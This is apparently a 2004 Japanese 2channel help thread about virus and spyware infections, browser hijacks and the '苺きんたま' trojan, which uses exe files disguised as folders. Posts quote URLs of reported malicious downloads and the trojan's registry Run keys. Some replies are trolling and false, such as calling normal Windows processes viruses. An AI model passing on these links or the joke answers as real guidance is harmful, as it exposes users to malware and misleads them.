駆除ツールをやってみても not been found と出ました 手動法もセーブモード 一応やってみましたが やはり かわりなしです DB化されたリストも スキャンログからコピー&ペーストで 一個一個検索して 怪しいものは消していきましたが それも かわりなしです
>>331 ウィルスに感染しているファイルを手動駆除できないのかどうか?
手動駆除方法でレジストリに残っているものはないかどうか?
再度最新の定義のノートンで全てのファイルをスキャンしてみて、
ウィルスは見つかるかどうか?
Ad-awareSEは試してみたかどうか?
感染したかわからないのですが、質問です。 脳豚先生がupdateできなくなりました。 spybot / adawareも同様に新しい定義ファイルが落とせません。 ですがetrustだけはこれまで同様にupdateできています。 有名なソフトのupdateが阻害されているということで、 これはウイルスに感染したか?と思い、 etrustとオンラインでスキャンをかけたのですが、 検出されたのは2chのログにあるloverletterくらい。 hostsも見てみましたが、特に妙な記述はありませんでした。 スタートアップにも怪しい記述はありませんし (強いて言えばphimeって2つあったっけ? desktopってcommon userと無名だった?というくらいです) 抽象的で申し訳ありませんが、 他にどこかチェックする場所等ありましたら教えてください。
334 :
名無しさん@お腹いっぱい。 :04/09/18 21:46:14
デスクトップに勝手にエロサイトのショートカットができるのですが、 Spybotや怪しいレジストリを削除しても駆除できません。 どのキーワードで検索したらいいですか?
>>334 漏れなら「エロサイトのURL」「ショートカット名」「shortcut」「desktop」
を適宜組み合わせて検索してみる
ぼるさんありがとうございました! 全てのファイルを表示にしても見えなかったので… コマプロで削除する事が出来ました。 既に同じ質問があったのですね… お手数お掛けいたしました。
337 :
名無しさん@お腹いっぱい。 :04/09/19 05:45:14
赤い血みたいのがわらわら出てくるんですけど なんでつか??こわい、、、
>>333 ノートン先生と、eTrustと、両方入っているから競合してるだけだと思う
ノートン先生がちゃんと最新の定義にできるならノートン先生だけにしろ
そうじゃないならeTrustだけにしろ
常駐するアンチウィルスソフトは2つ入れちゃダメ!
339 :
名無しさん@お腹いっぱい。 :04/09/19 10:22:23
ウイルスに感染した場合、そのパソコンのHDDを他のパソコンに繋いで 感染したHDDをスキャンして、元のパソコンに戻せば大丈夫ですか?
>>339 ソースネクストは激しくお勧めしない。不具合が多すぎる
その2つのどちらかを買うのならウィルスバスターかな。
フリーのソフトもあるから、情報は色々探してみろ
>>339 俺もソースネクストはやめとくことを強く推奨する。
体験した本人が言うんだから間違いないorz
343 :
名無しさん@お腹いっぱい。 :04/09/19 12:38:30
PC上のmp3、ipg、zip、wmaなどのファイルふぁ全て同じ容量になって破損していたのですがこれはウィルスでしょうか? それともPCが壊れてるだけ?
344 :
名無しさん@お腹いっぱい。 :04/09/19 13:07:37
当方、XP使用しておりますが、 backdoor Agentが毎回検出されるのと、windowsのundateをしようとすると Active-Xがどうのこうのとかいうメッセージが出てきて一向にundateできません どうしたらよいのでしょうか
>>339 ソースネクストはやめておいたほうがいい
>>343 ウィルスですか?と聞く前にスキャン
>>344 Backdoor駆除してからUpdate
>>343 nyやめて、ネットから引退してください
348 :
名無しさん@お腹いっぱい。 :04/09/19 16:57:24
ノートン先生が検出し、削除できなかったSpyware.Iwantserchを 手動削除しようとしましたがコマンドプロンプロからも見つかりません。 再スキャンをかけると同じ感染ファイルがまた検出されます。 対策知っている方いたらお願いします。 (ノートン先生はライブアップデート済み)
>>348 スパイウェアの一種だから、SpybotとAd-awareSEでスキャン・駆除できるかもね
両方ともフリーウェア。
>348 そんなあなたに>85-86
351 :
348 :04/09/19 17:38:03
【使用OS、WindowsUpdateの有無】XP(SP2)、有 【使用AntiVirus、Updateの有無】Norton AntiVirus、有 【スキャンした結果】 ウィルス名:Spyware.Iwantserch 結果・場所:圧縮ファイル rundlg32.dll < C:\Documents and Settings\02765mari Local Settings\Temporary Internet Files\Content.IE5\650VILYH\rundlg32[1].cab は スパイウェア 脅威です。 圧縮ファイル rundlg32.dll < C:\Documents and Settings\02765mari\Local Settings\Temporary Internet Files\Content.IE5\WXSN4RS7\rundlg32[1].cab は スパイウェア 脅威です。…とノートン先生談。 【症状】今のところなし。サイト閲覧中に感染? 【とった措置】ノートン先生・スパイボットスキャン→手動削除(コマンドプロンプト) よろしくお願いします。 >349 Spybot試しましましたが、駆除できませんでした。
>>351 IEのキャッシュ削除すればいいんでないNO?
ツール→インターネットオプション→全般
→インターネット一時ファイル→ファイルの削除
→「すべてのオフラインコンテンツを削除する」にチェックしてOK
でノートンで再スキャン
353 :
339 :04/09/19 18:06:09
みなさま、ありがとうございます。ソースネクストはやめときますね・・・
354 :
名無しさん@お腹いっぱい。 :04/09/19 19:47:06
>352 試してみましたが、ダメでした… が、システム復元後、再スキャンしたら消えていました レスありがとうございました!
W32.Yahaの症状が出ていますが、見つからず駆除できません。 これで合っているのか、それとも違うものなのか教えてください。 【使用OS】WinXP Personal SP1 【WindowsUpdateしてるか】たまにナローな環境で使用しているので、その時はしていませんが、BBの時は行っています。 【AntiVirusは何を使っているか】McAfee VirusScan 疑惑後に入れた体験版ウィルスキラー 【ちゃんとUpdateしてるか】WindowsUpdateと同様BBな時のみ。 【スキャンした結果(ウイルス名・発見場所)】発見されず。 【症状を具体的に、分かる限りすべて書く】起動時に「vsynmgr.exe はエラーが発生し閉じられる必要がありました。」と必ず出る。 データ送信量が多い気がする。受信より少し多い程度。何もしていないときは増える事はない。 マカフィーを起動し閉じると「scan32.exeが閉じる」とメッセージが出る。 【何をしたらそんなことになったのか】プリンタのドライバをインストールした。外付けROMで入れたのだが、 インスコ後、安全な取り外しを実行せずにPCカードを引っこ抜いた。それとネット。 【これまでにとった措置】オンラインスキャン(マカフィー、シマンテック、トレンドマイクロ3箇所全て)が発見できず。 自分のPCに最初から入っていたマカフィーもしたが、期限が切れてるかも。PC購入は2001年秋。 バージョンは2004年9月14日になってる。駆除ソフトをDLし実行→ウィルス存在せずで終了
>>355 アンチウイルスソフトが競合してscan32.exe(マカフィー)vsynmgr.exe(ウイルスキラー?)
の起動がうまくいってないんでないの?
どっちか片方アンスコして再起動してみてちょ
357 :
名無しさん@お腹いっぱい。 :04/09/19 22:41:24
なんか変なURL踏んじゃって、変なツールバー出るし何回やってもホームのページが 固定されてるし…。助けてください!お願いします。
釣られないクマ・・・
初心者はとりあえずパンダオンラインスキャンでもやっとけ
360 :
名無しさん@お腹いっぱい。 :04/09/20 00:05:51
質問なんですが アドウェアが16個も発見され、削除しようとウィルス名からリンクされたページでの 「定義の更新→設定→コントロールパネル→追加と削除」を実行したんですが 追加と削除のファイル一覧にウィルスが表示されておらず削除が出来ません; 何か方法を間違っているのでしょうか 解決方法などあればよろしくお願いいたします スレ違いでしたらすみません
361 :
名無しさん@お腹いっぱい。 :04/09/20 02:22:16
パスワード付きの圧縮ファイルの中身も ウイルススキャンできるんでしょうか?
>>361 それをやるには圧縮ファイルのパスワードを解読して中のファイルへ
アクセスする(通常は一時的にテンポラリに解凍する)必要がありますが
それができるウイルス対策ソフトなんてあるのでしょうか?
363 :
名無しさん@お腹いっぱい。 :04/09/20 12:10:22
>>360 他人に何かを質問しようという気持ちが全く見えない
自分がどういう環境でどういうソフトで何をやったのか?
という基本的な情報を何故書けないのか?
スルーすればいいよ。12時間も前田氏
365 :
名無しさん@お腹いっぱい。 :04/09/20 20:20:22
誘導されてきました。 お願いします。 XPで2ちゃん壺入れてます。 シマンテックのオンラインスキャンでかけたら C:\Program Files\tora3\2chtubo\log\pc5.2ch.net\sec\**********.dat は Unix.Penguin に感染しています。 と出ました。 これは入れてる壺のだと思うんですが 何か対策した方がいいのでしょうか? **********の部分は数字です。
しなくていいんじゃない
win2kのsystem32にCmdLineExt03.dllってのが勝手にインスコされてたんだが これってウイルス?
>365 今回の件は気にしなくてもいいが ウイルス気にするならアンチウイルスソフト入れれ
>>365 誘導じゃなくて、ここのテンプレに答えが載っているんだが。
CmdLineExt03.dllがインスコされた時間と同時刻にLocal Settingsに SIntfNT.dll、SIntf32.dll、SIntf16.dllがインスコされてた これSecuRomのファイルみたいだけどCmdLineExt03.dllはなんだか分からん
GTA3vicecity起動インスコされるようだな 今までインスコされること無かったのになんで急にインスコするようになったんだろう
w2kで、起動時にデスクトップの中心に fRf"f^fNfg と書かれたダイアログが出ます。右上に最小化/最大化/閉じるボタンもついてないただの四角の上にかかれてます クリックすると消えるんですがタスクマネージャで見ても変わった名前のプロセスはありません。 ウイルスか何かでしょうか?
>>355 です。
>>356 vsynmgr.exeはウィルスキラーを入れる前から出てました。
ウィルスキラーを消したんですが、いまだにscan32と共に出ています。
>>375 asynmgr.exeのミスタイプじゃない?
これだったらマカフィーのexeかもしれないからマカフィーが
何かの拍子でイカれたのかも・・・
とりあえず一度マカフィー再インスコしてみてちょ
vsynmgr.exeであってるとしたらこいつが何か調べるためにもこのexeのパス、同じフォルダ中にある他のファイル
と作成日時に違いがないか調べてみて。
あとはセキュリティーソフトの機能を停止させるウイルスがいる可能性もあるから
ファイル名を指定して実行→msconfigでスタートアップに登録されているexeで
怪しいのがないかチェック
あとregeditでHKEY_LOCAL_MACHINE\Software\Classes\exefile\shell\open\command
の値が"%1" %* になってるかチェック
>>366 サンクスコです
>>368 サンクスコです。
NISは入れてあるのですが
なんとなく気まぐれでオンラインスキャンをかけてみた所
上記のモノが出てきました。
NISではひっかからなかったので気になって質問しました。
>>369 >>7 を見てみましたが どの記載が適してるのか不明だったので
こちらでも質問しました。
>>7 のどこに答えがありますか?
>>376 レスさんくすです。
avsynmgrの打ち間違いでした。
マカフィーは元々入っていた奴なんで、アンインストールしたら返って面倒な気がする・・・
regeditは値は指摘した通りのものになっています。
あと、OLEのアドレス帳には自分のアドレスしか入っていないんですが、
(使用するものはメール鯖に入ってる。友達が居ないわけではないです)ウィルスメールは来ていません。
壊れただけかなぁ・・・
マカフィーのせいでうちはPCあぼーんしたよ 期限すぎて更新したとたんにっちもさっちもぶるどっく
>>379 それで貼ったリンクがそれかよ
お前はここで答える資格ないな
こんな事する馬鹿がいるからここの評判落ちるんじゃん。 ハァァ。。。
「ストーカー(粘着野郎)に共通する特徴」
http://gb.bbs.ws/book.php?book=gall1 ・初対面の人にも「自分史」を話したがる
・筆まめ
・電話魔
・人によくカマをかける
・親しくも無いのに高価なプレゼントを贈る
・他人への評価が極端に変わりやすい
・敵・味方を区別したがる
・怒り出すと止まらない
・人並み以上に情報に敏感
・複数以上の仕事を同時にこなせる
・拒絶・拒否を受け入れる事ができない、自己中心的
・自分の弱点や劣等感を感じていても、自分で認めようとしない
・何かと周りのせいにして言い訳ばかり
・大人になりきれない幼児性
・最初は、優しくて場合によっては魅力的
385 :
名無しさん@お腹いっぱい。 :04/09/21 07:38:48
avast!4スレから、スレ違いの指摘を受けて来ました。 このソフトはかなり好きで、正式に日本語化する前から愛用しています。 しかし、ここでトラブル発生。 未だもって、「プロキシサーバ」というものの概念がわからない厨なんですが、 POP/SMTPサーバにはローカルの、127.0.0.1 を置いて使用していたのですが、 新たに、SPAM対策として、SpamDump というシェアウエアを導入しました。 が、このソフトもローカルの、127.0.0.1をそれぞれ必要とする、ということで、 重複している状態です。 ヘルプマニュアルにもそれにあたるらしきところは無く、どのように共存してい ったら良いものか・・ネットワーク関連はほとんど分からなくて、ここにたどり着 きました。 教えてえらい人!!
>>372 するようにしたからなった。
今は航海している。
>382 じゃあお前が答えてやれよ
389 :
名無しさん@お腹いっぱい。 :04/09/21 13:49:59
始めまして 質問なんですがウイルススキャンしたらPE.parite.Aというのが大量に表示されたんですが・・どうしたらいいのでしょう?
>389 そんなあなたに>85-86
392 :
名無しさん@お腹いっぱい。 :04/09/21 15:29:47
トロイの木馬ってなに? やばいの?
文章が読めないから初心者というんだな
>>392 気にしすぎるとシュリーマンのような嘘つきになる
396 :
名無しさん@お腹いっぱい。 :04/09/22 02:42:33
N速で下のjpg踏んじゃったんだけど tp://white.jpg-gif.net/bbsx/1/img/110153.jpg >そのjpgはトロイの木馬系の亜種ウイルスでワクチンがない >(名称) >アングラ俗称で正式名はまだない >ipeg_troj2174 >(特徴) >1時間以上パソコンにあるとjpgからトロイ木馬がハードディスクに寄生する。 >30分毎にレジストリー情報を送信する >寄生したあとは普通のjpgだから見てもどうもない >貼り付けた人は危険 >(除去方法) >なし。ハードディスクを初期化するしかない これ本当でしょうか?XPのSP1のセキュリティホール狙った奴なんでしょうか?
>>396 俺の推測だがそれは嘘だろ。何もないはず。
まずそんなウイルス聞いたことがない。
>そのjpgはトロイの木馬系の亜種ウイルスでワクチンがない
トロイの木馬系亜種って何だ? netsky(ウイルス名)の亜種とかならわかるけど
>1時間以上パソコンにあるとjpgからトロイ木馬がハードディスクに寄生する。
ハードディスクに寄生するなんて無理
>寄生したあとは普通のjpgだから見てもどうもない
最初からどうもないjpg
あ〜なんでこんな時間まで起きてるんだろう なぜなら厨だから
ウイルスの情報載せた厨を信じるか 平日のこんな時間まで起きている厨を信じるかは自由だが・・・・
398 :
名無しさん@お腹いっぱい。 :04/09/22 14:47:34
DLしたZip開いたらALEScan.exeっていうやばそうなファイルが入ってたんで速攻消してみました。 その後ぐぐったらBackdoor関連のセキュリティーページ(国外)が出てきたので かなり不安になったのですが、実行してなければ大丈夫なんでしょうか?
毒入りりんごを持っててもなんの害もないだろ 喰わなければ問題なし
>>398 とりあえず、スタートアップに見慣れないものが無いかチェックしてから
ウイルスとスパイウェアのチェックをしたほうがよさげ。
>>398 不安になったら即ぜんぶスキャンしるべし
HDDぜんぶスキャン終わってOKなら一流
ぁゃιぃものが検疫されて終わったら二流
字が下手なのは金釘流
アラゴの円盤は渦電流
403 :
名無しさん@お腹いっぱい。 :04/09/22 16:02:35
>>401 RAMASSTとかいうのがWindows\system32フォルダにあるっぽいです。。。
>>402 ウィルス等は全く検出されませんでした。
404 :
名無しさん@お腹いっぱい。 :04/09/22 16:05:53
でもこれRAM補助ツールですよね・・・ しかしこんなの入れた覚えは・・・
もうだめぽ 再インスコするしかないぽ
事故解決しました
407 :
名無しさん@お腹いっぱい。 :04/09/22 17:05:38
とりやえず再起動しても表面上は問題なし。
裏でヤラレてるかも知んないけど。。。(´・ω・`)
どーでもいいんだけどこのスレ宙が多いのは仕様ですか?
てっきりセキュリティーの専門家とか質問に来た素人だけが来てる板かと思ってた。
質問スレがこの有様だからねぇ。
>>401-402 サンクス。何かあったらまた質問しにきます。
と、sageることができない宙(厨のことか?)が申しております
テンプレすら読まない輩に対してつっけんどんな対応をするのは仕様です
はじめまして、 IEのホームがクール何とかになってしまうウイルスにかかってしまいました。 オンラインチェックで引っかかったファイルはすべて消したのですが それでもホーム設定のところは直りません。 どうしたら良いもんでしょうか、、、orz
>>411 エロ多すぎ
エロサイトを見た(ry
全部書くのマンドクセ
書いてあるとおりに試してみました。 ダイヤラーなどは出なくなったのですが、 ホーム設定だけは何度やっても IE再起動すると同じサイトになってしまいます。 どなたかお助けください、、、
馬鹿なことしてW32/Bereb-Bというウイルスに感染してしまったんですが ノートンの体験版で修復しようとしても このファイルを修復できません ファイルへのアクセスが拒否されました と表示されて 何もできないんですがどうすればいいですか?
>>418 起動FDから立ち上げてDOSコマンドで消す
>>416 何をどこまでやったのか書かんと、わからんよ。
あと、質問汁と言ったのは向こうのスレでって事。
今、優秀な(?)質問者がいて、回答者が気分よくなってる
ところだから、テンプレもロクにやらんで質問しても叩かれる
だけだとは思うが・・・。
>>418 ノートンで検出されたワーム名で、シマンテックのサイトで手動駆除方法を検索してみ。
レジストリとかいじられてるかもわからんし。
424 :
名無しさん@お腹いっぱい。 :04/09/22 20:49:56
あるアプリを実行したら壁紙を変えられてしまったのですがどうすれば直せるのでしょうか?
失意登?失意昇?
426 :
名無しさん@お腹いっぱい。 :04/09/22 20:56:33
今日はZoneAlerm先生がやけに反応するんですが、なにか新しいワームでも流行ってるんですか? NetBios、Port135、Port1433、Port445あたりが攻撃されるんですが。
>>424 >>86 の質問テンプレ使ってくれ。
あと、もしwinnyで落としたアプリなら板違い。
428 :
名無しさん@お腹いっぱい。 :04/09/22 21:01:21
>>424 メモ帳で空白のファイルを作成してそのウイルスの実態に上書き保存→削除
ってどうかな?無理だったらスマソ
>>412 169 :名無したん(;´Д`)ハァハァ :04/09/22 21:39:41 ID:LP+Ly6X1
23 :名無しさん@ゴーゴーゴーゴー! :04/09/22 21:37:54 ID:kcrfEebX
実行結果:
追加されるファイル:
windows\shellsystem.exe 678kB
追加されるレジストリ:
HKEY_USER\.Default\Software\Microsoft\Windows\CurrentVersion\Run
shellsystem.exe :='C:\Windows\shellsystem.exe'
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
shellsystem.exe :='C:\Windows\shellsystem.exe'
433 :
名無しさん@お腹いっぱい。 :04/09/22 21:58:11
434 :
名無しさん@お腹いっぱい。 :04/09/22 22:07:32
435 :
名無しさん@お腹いっぱい。 :04/09/22 22:35:21
【使用OS】 WindowsXP Home 【WindowsUpdateしてるか】 はい 【AntiVirusは何を使っているか】 Norton Antivirus 【ちゃんとUpdateしてるか】 してるみたい 【スキャンした結果(ウイルス名・発見場所)】 W32.HLLW.Rircなど C:\DOCUMENTS AND SETTINGS\ALL USERS\の中 【別のオンラインスキャンしたならその結果は】 スキャンすると感染が見つからなかったor別のウイルスの名前が出る 【症状を具体的に、分かる限りすべて書く】 いきなりNortonのダイアログが出て「ウイルスを検出しました」と出る またその時どんなウイルスでも必ず「ファイルを修復できません」「ファイルへのアクセスが拒否されました」となる また最近IEの画面が出にくくなった 【何をしたらそんなことになったのか】 普通に常時接続で 【これまでにとった措置】 【その他の質問】 これは感染しているのか、単なる2ch上でウイルスコードを書くだけのいたずらなのか
529 名前:AA略 ◆.AwAwARK.Y [sage] 投稿日:04/09/22 21:00:08 ID:??? 2ちゃんのあるスレでデスクトップの画像をキャプされてうpろだに自動うp→スレに書き込みが されるexeが出てきたね。 zipなりを解凍して(写真集) (ロリータ)〜みたいなフォルダ(実際にはフォルダのアイコンのexe) がでてきたらご注意を 535 名前: 〜ヽ ノ ◆25P/xaaPnk [sage] 投稿日:04/09/22 21:36:20 ID:??? exe3つの奴って、軽いきんたまって感じですね。 Regedit開ける知識があれば大した事はないですけど。 536 名前:名無しさん?[sage] 投稿日:04/09/22 21:43:38 ID:??? 本スレ721危険 エディタで見たら“This program must be run under Win32”って文字列あり “アイコン”は、フォルダだけど「フォルダオプション」→表示→すべてのファイルとフォルダ にチェックマーク入っていないと.exeの拡張子が見えない。 要するに、かっこうは、フォルダだけど、実際は、ぁゃιぃexe まぁ踏むのは(踏んだのは)自己責任だけど、気を付けて・・・3個ともに! 537 名前:名無しさん?[sage] 投稿日:04/09/22 22:13:46 ID:??? 「苺きんたま」だそうです(w
438 :
名無しさん@お腹いっぱい。 :04/09/23 00:11:45
ゲームとかをしてると突然電源が落ちるのですが、一体どうなっているんでしょうか? 友人に聴いてもお手上げ状態です。 心当たりは //with2ch.net/cgi-bin/eat/img-box/img20040825044933.jpg このファイルを踏んだらウインドが閉じれなくなり、 何かをインストールする画面も消せなかったので強制終了させました。
440 :
名無しさん@お腹いっぱい。 :04/09/23 00:30:06
【使用OS、WindowsUpdateの有無】XP HOME 【使用AntiVirus、Updateの有無】ウイルスバスター している 【スキャンした結果(ウイルス名・発見場所)】異状なし 【症状】ゲームとかをしてると突然電源が落ちます。 サイトなどを見ている分には電源は落ちません。 心当たりは //with2ch.net/cgi-bin/eat/img-box/img20040825044933.jpg このファイルを踏んだらウインドが閉じれなくなり、 何かをインストールする画面も消せなかったので強制終了させました。 【これまでにとった措置】AD-awareとウイルスバスターのスキャン
そういや「shellsystem.exeが接続しようとしているんですけど、これって何?」とか 質問していた奴がこの板にいたような。 あれ新種のきんたまウイルスだったのか。
苺はウィルスとは言えないなぁ。分類するならトロイだな。
これウィルスチェックで検出されるの?ノートンとかVB2004とかで。
nyじゃないがDL板逝きだな
さっきいきなりクイック起動のアイコン全てとmydocumentの中身全てと デスクトップのよく使うアイコンが消えたんですが これってトロイか何かでしょうか?
449 :
名無しさん@お腹いっぱい。 :04/09/23 06:52:42
2chを潰すためのウイルス。 面白そうだな。
450 :
名無しさん@お腹いっぱい。 :04/09/23 08:43:25
451 :
450 :04/09/23 09:08:27
すみません、質問させてもらいます。 ウイルスチェックしたところ、 secure.htmlにJS_STARTPAG.AD感染、 secure32.txtにJS_STARTPAG.AD感染、 toolbar.exeにTROJ_SMALL.AJ感染してました。 対応を見たところ、検出されたファイルは削除してしまって良いと書いてありますが、 削除してしまったらやばそうな感じがします。secure32.txtはsystem32に置いてありますし。 これって削除してしまって良いのでしょうか?
またエロか
苺金玉に感染したか否かを調べる方法を教えて下さい。 昨日の夜中に、金玉アドレスを踏んだような、踏んでないような。 JAVAONで、HTMLなら、自らEXEを実行してなくても、勝手に実行している可能性ってあるんですよね?
>>454 レスありがとうございます。
友人に少し聞いてみたところ、Windowsが起動しなくなると言っていましたが、
信じていいんですね?
>>456 じゃあ、友達を信じればいいじゃん
友達はwindowsに詳しいんだろ?
>>455 shellsystem.exeでHDD内を検索しろ。
exeを実行しなければ今の所は大丈夫だとは思うが。
苺金玉はDL板行けば感染した場合での削除方法が上がってるので、今後はそちらで。
windowsフォルダ内に $NtUninstallQ{何かの数字が入ってる}$ というフォルダがいくつもあるんですが これはウィルスですか? あともう一つ windowsフォルダ内にtwain_32 というフォルダがあるんですが、 ウィルスですか? 教えてください。お願いします。
BKDR_SURILA.Bってトロイってのに感染したみたいなんだけど これってどうやって駆除したらいいんですか? ウイルスバスターで隔離はしてるんだけど。 OSはXPです
hot_mailに差出人、件名など空白のメールで ウィルスらしき添付ファイルがあり消そうと思って チェックボックスにチェックを入れると、他の関係ないメールにまで 全てチェックが入ってしまい消すことができません。 仕方なく別のフォルダに他のメールを移動させてその添付メールだけにして 消そうと思ったら、「このフォルダにはメッセージがありません。」となってて メールとして認識されてないようなんですがこのメールを消すにはどうしたらいいのでしょうか?
>459 ウイルスかと疑うならウイルスチェックしてください アンチウイルスソフトをもってなければオンラインスキャンでもどうぞ >460 まずは>85-86をどうぞ
>>463 なんてこと言うんだ。
>>461 さんがかわいそうじゃないか。
この場合はあれだ。HDDフォーマットだ。うん、これだ。
ウィルスソフトで修復できないウィルスってありますか?
ウイルスソフトじゃなぁ
>467 地雷サイトに直リンすんな! これ踏んで被害者が出たらどうすんだ アンチウイルスソフト入れてなければ TrendmicroでもSymantecでもMcAfeeでもいいから サイト行ってオンラインスキャンして来い
うっせーばか
474 :
名無しさん@お腹いっぱい。 :04/09/23 21:23:25
473 名前:名無しさん@お腹いっぱい。[sage] 投稿日:04/09/23 21:21:37
>>473 市ね
473 名前:名無しさん@お腹いっぱい。 投稿日:04/09/23 21:21:37
>>473 市ね
【使用OS】 WindowsXP Home 【WindowsUpdateしてるか】 はい 【AntiVirusは何を使っているか】 ウィルスバスター2004 【Updateしてるか】 はい 【ウイルス名】 BKDR AGENT.K (SYSTEM32内の.dllファイルで発見) 【症状を具体的に、分かる限りすべて書く】 その.dllファイルにマウスカーソルをあてて選択状態にした時と、 Internet Explorerを起動した時にウィルス発見のメッセージが出る。 しかも『隔離できませんでした』と。 【何をしたらそんなことになったのか】 普通に常時接続で 【これまでにとった措置】 その.dllファイルを削除しようとしてもエラーメッセージが出て失敗。 こんな状態なんですが、どうしたら削除できますかね?
>>476 まったく同じ症状です
うpでーとしたら感染しますた・・・orz
なんで死ななきゃいけないの?
【使用OS】 WindowsXP Home
【WindowsUpdateしてるか】 してません
【AntiVirusは何を使っているか】 ノートン2004
【Updateしてるか】 してません
【ウイルス名】 Unix.Penguin こんなんが次々と
【症状を具体的に、分かる限りすべて書く】
ブラウザのホームページが
http://213.159.117.134/index.php になっていました。インターネットオプションで設定変えようとしても
こっちのほうが便利だというような英語のウィンドウがでて変更できません。
2ちゃん見たりは普通にできます。
【何をしたらそんなことになったのか】
愚息がエロサイト拝見しておりました
【これまでにとった措置】
スキャンしたりいまさらウィンドウズアップデイトしたりしましたが
状況は変わりません。
識者の方ご指導お願いします。
482 :
やちゃた :04/09/23 23:21:40
みなさんの知恵を貸してください。 調べることは調べたのですが、対抗策がいっこうに見つからないのです。 OS:2000 症状:とあるゲーム(居昇殿?)の最中急に重くなり、 次からそのゲームを立ち上げるたびにウィルスバスター2004から 名BKDR_SURILA.B 場所C:\WINDOWS\system32\SVKP.sys のウィルス隔離の表示が出ます。 推測:ゲームからとか、ゲーム内に規制したのではなく、画面を変更?するときに 活動してるのかなー やったこと:これが間違った。レジストリーをいじってしまいました。 調べに調べたが同名のウイルスの情報が見つからず、 丸1日使ってとうとう、軽はずみに えーい!怪しいのは全部削除だ!!としてしまい ウイルスは残ったままで、ワード、エクセル、メール送信 ができなくなってしまった。私はおおうつけです。 オフィスのCDも受け付けてくれない.... 皆さんに助けてほしいこと:私の失敗で動かなくなったものは自己責任 しかし、この BKDR_SURILA.B とやらの 正体と対策を教えていただきたい。 お願いします。
>>482 知りたい事はBKDR_SURILA.Bの正体と対策で
ワード、エクセル、メール送信を出来るようにはしたくないのか…
>>481 えーとですね、その使用環境だとウイルスやワームやトロイや
スパイウエアやアドウエアやらにかなりやられてると思いますので
OS再インストールした方が手っ取り早いと、私は思います。
>>482 最新パターンファイルに乗ってるぐらい新しい奴だから解説もなし。
解説できるまでマターリ待っとけ。
hot_mailに差出人、件名など空白のメールで ウィルスらしき添付ファイルがあり消そうと思って チェックボックスにチェックを入れると、他の関係ないメールにまで 全てチェックが入ってしまい消すことができません。 仕方なく別のフォルダに他のメールを移動させてその添付メールだけにして 消そうと思ったら、「このフォルダにはメッセージがありません。」となってて メールとして認識されてないようなんですがこのメールを消すにはどうしたらいいのでしょうか?
>>486 基本的にHotmailにはウィルスは来ないんだよねむ
すんません、教えていただきたいです。 自分はサイトが作れる程度のHTMLしか知らん、Win2000を使っている者です。 最近ウィルスに感染してウィルスバスターで一応駆除したのですが、 キンタマに感染してたのかどうか不安です。 苺キンタマなどのウィルスに感染していない通常のとき、 タスクマネージャーのプロセスにexeファイルが表示されることはあるんでしょうか? 今表示されているexeは下です。 SMSS.EXE CSRSS.EXE WINLOGON.EXE LSASS.EXE svchost.exe spoolsv.exe Ctsvccda.exe svchost.exe regsvc.exe mstask.exe WinMgmt.exe mspmspsv.exe svchost.exe tmproxy.exe imejpmgr.exe svchost.exe realsched.exe explorer.exe NewsUpd.exe internat.exe BsCLiP.exe OSA.EXE PCCPFW.exe conime.exe YPagerJ.exe Tmntsrv.exe PCClient.exe pccguide.exe TMOAgent.exe IEXPLORE.EXE TASKMGR.EXE
490 :
名無しさん@お腹いっぱい。 :04/09/24 00:54:13
>>489 SMSS.EXE CSRSS.EXE WINLOGON.EXE LSASS.EXE
svchost.exe spoolsv.exe Ctsvccda.exe svchost.exe
regsvc.exe mstask.exe WinMgmt.exe mspmspsv.exe
svchost.exe tmproxy.exe imejpmgr.exe svchost.exe
realsched.exe explorer.exe NewsUpd.exe internat.exe
BsCLiP.exe OSA.EXE PCCPFW.exe conime.exe
YPagerJ.exe Tmntsrv.exe PCClient.exe pccguide.exe
TMOAgent.exe IEXPLORE.EXE TASKMGR.EXE
残念ながら全てウィルスです
ログリスト
"時刻","検索の種類","種類","ウイルス名","感染元","ウイルス検出時の処理","ウイルス駆除できない場合の処理"
"00:18","受信メール検索","e-mail","HTML_Netsky.P","Mail Delivery System <
[email protected] > ""Mail delivery failed: returning message to sender""","ウイルス駆除 できません","削除 できません"
"00:18","受信メール検索","e-mail","WORM_NETSKY.P","Mail Delivery System <
[email protected] > ""Mail delivery failed: returning message to sender""","ウイルス駆除 できません","削除 できません"
この2個のメール受信後メール送るたびに添え付けFILEが自動添付されるようになり
困ってます、、
この場合の対処法ご存知の方ご教授おねがいします。
>>490-491 ありがとうございます。やはりウィルスですか…
ちなみにこれは通常のウィルスかキンタマ系ウィルスかわかるでしょうか?
>>493 違う違う。俺が貼ったサイトは通常、普通にあるタスクの一覧。
他にアプリ入れてたら、載ってないのもあるし。
ちょっと祭り会場にいきたいんで、んじゃノシ
>493 載ってなくてウイルスかどうかを判断するにはググるのが一番良い
ウィルスに感染してる時に 自分のデスクトップにある画像やらをCD-RWに保存した場合、何か問題はありますか?
>>485 ありがとうございます。
以後気をつけます。
>497 何らかの形で実行しなければ問題ない
500 :
名無しさん@お腹いっぱい。 :04/09/24 01:51:56
すいません、
>>482 と同じウイルスにかかったことがトレンドマイクロのオンラインスキャンで分かったのですが・・・
ゲーム中、急にブルースクリーンになって、スキャンしてみたんですが、なにをしているウイルスなのか説明が無くとても不安なんです。
調べてみても、バックドアを作られてコンピュータの情報が見られてしまうくらいしかわかりませんでした。
そしてpandaのオンラインスキャンで駆除を試みたのですが、こちらでは検出されませんでした。
このウイルスはどのようにして削除すればよいのでしょうか?
また、放っておくとどうなってしまうのでしょう?
ウィルスバスターが「ウィルスに感染したので自動修復しました」 ってなったんですけど、ウィルス名「DEADLINK」ってどんなやつでしょうか? トレンドマイクロのデータベースで調べてもでてこないので・・・
504 :
名無しさん@お腹いっぱい。 :04/09/24 02:57:51
>>503 なるほど、ありがとうございましたm(__)m
すいません質問です 今日初めてPandaでオンラインスキャンしてたとき avast!のスクリーンセーバーでスキャンするやつも始まって Pandaのオンラインスキャンの始めにダウソされるファイルに Win32:Kuang2が検出されたのですがこれは大丈夫でしょうか? 調べたらバックドアトロイの木馬で、スキャンの為に入れられたのかな?とおもったんですが不安です。 ちなみにOSはWin98でAD-awareSEとSpybotとSpywerBlasterとOutpostが他にはいってます
506 :
名無しさん@お腹いっぱい。 :04/09/24 03:17:58
名前: 名無しさん
内容:
デスノートが最終話だってさ
ttp://strawberry.web-sv.com/cgi/up/ia/up1360.zip 中身は来週のジャンプ詰め合わせだ
↑
不覚にも、これexe.file(すでに404)を踏んでしまいました。
スキャンしてウィルスではなかったのはいいが、
ファイル削除したのに、 いまだに処理速度が遅いままなのです。
このexeをゴミ箱に捨てようとしたら、削除できないって出たけど、
